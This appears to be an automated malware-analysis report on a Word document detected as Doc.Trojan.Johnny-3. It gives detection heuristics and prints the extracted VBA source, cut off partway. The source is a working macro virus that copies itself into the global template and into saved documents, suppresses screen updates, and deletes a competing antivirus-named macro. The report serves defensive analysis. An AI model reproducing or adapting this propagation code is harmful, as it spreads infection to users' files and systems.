MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Johnny-3'. It contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's logic suggests it attempts to copy itself to other documents, a common technique for macro-based malware propagation.
Heuristics 4
-
ClamAV: Doc.Trojan.Johnny-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Johnny-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18133 bytes |
SHA-256: aed446ad6ab4f82871a07636b1522001772f016d5523c4cf86dd4970678f5e09 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "vGojohnny"
Public Sub MAIN()
'Our devise - A copy of "Go Johnny Go" on every computer !
' M.H., E.R.
End Sub
Attribute VB_Name = "Presentz"
Public Sub MAIN() 'fs
Dim d$
Dim MH
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim iMC
Dim BI
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
MH = Len(d$)
For i = 0 To MH
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If MH - lnh1 = 0 Then
On Error GoTo -1: On Error GoTo ecss
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.PrintStatusBar "For Help, press F1"
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.MacroCopy "Global:Presentz", WordBasic.[FileName$]() + ":FileSave"
WordBasic.FileSaveAs dlg
GoTo aend
Else
If WordBasic.[Right$](d$, 3) = "DOC" Then
MC
WordBasic.FileSaveAs Format:=1
Else
WordBasic.FileSave
End If
End If
ecss:
If Err.Number = 102 Then GoTo aend
aend:
On Error GoTo -1: On Error GoTo aen
iMC = WordBasic.CountMacros(0, 0)
For i = 1 To iMC
If WordBasic.[MacroName$](i, 0, 0) = "FileSaveAs" Then
BI = 1
End If
If WordBasic.[MacroName$](i, 0, 0) = "DrWebScan" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DrWebScan", Tab:=3
End If
If WordBasic.[MacroName$](i, 0, 0) = "FileOpen" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="FileOpen", Tab:=3
End If
Next i
If BI = 0 Then
WordBasic.MacroCopy d$ + ":Presentw", "Global:FileSaveAs"
End If
aen:
End Sub
Private Sub MC()
Dim ds$
ds$ = WordBasic.[FileName$]()
WordBasic.MacroCopy "Global:Presentv", ds$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Presentv", ds$ + ":Presentv"
WordBasic.MacroCopy "Global:Presentw", ds$ + ":Presentw"
WordBasic.MacroCopy "Global:Presentz", ds$ + ":Presentz"
WordBasic.MacroCopy "Global:vGojohnny", ds$ + ":vGojohnny"
End Sub
Attribute VB_Name = "Presentw"
Public Sub MAIN() 'fsAs
Dim d$
Dim Dl
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim NO$
Dim O_D_P$
Dim TMP$
Dim stt$
Dim tm$
Dim tm2$
Dim FileN$
Dim NDPh$
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
Dl = Len(d$)
For i = 0 To Dl
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If Dl - lnh1 = 0 Then
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.FileSaveAs dlg
GoTo aend
End If
NO$ = LCase(WordBasic.[Right$](d$, lnh1))
O_D_P$ = WordBasic.[DefaultDir$](14)
TMP$ = WordBasic.[DefaultDir$](13)
stt$ = TMP$ + "\doc2.doc"
tm$ = TMP$ + "\" + NO$
tm2$ = TMP$ + "\~wrf7mhr.tmp"
If WordBasic.[Files$](tm2$) = "" Then
WordBasic.FileNewDefault
WordBasic.Insert "NAIPESVOH REHM"
WordBasic.PrintStatusBar "Starting Autosave"
WordBasic.FileSaveAs Name:=TMP$ + "\doc2.doc", Format:=0
WordBasic.FileClose
WordBasic.Rename TMP$ + "\doc2.doc", tm2$
End If
WordBasic.CopyFile FileName:=tm2$, Directory:=tm$
WordBasic.FileOpen tm$
WordBasic.PrintStatusBar "For Help, press F1"
On Error GoTo -1: On Error GoTo ife
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Name = NO$
WordBasic.Dialog.FileSaveAs dlg
FileN$ = dlg.Name
NDPh$ = WordBasic.[DefaultDir$](14)
If Len(NDPh$) > 3 Then NDPh$ = NDPh$ + "\"
If dlg.Format > 1 Then
WordBasic.FileClose 2
WordBasic.Kill tm$
WordBasic.FileSaveAs N
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.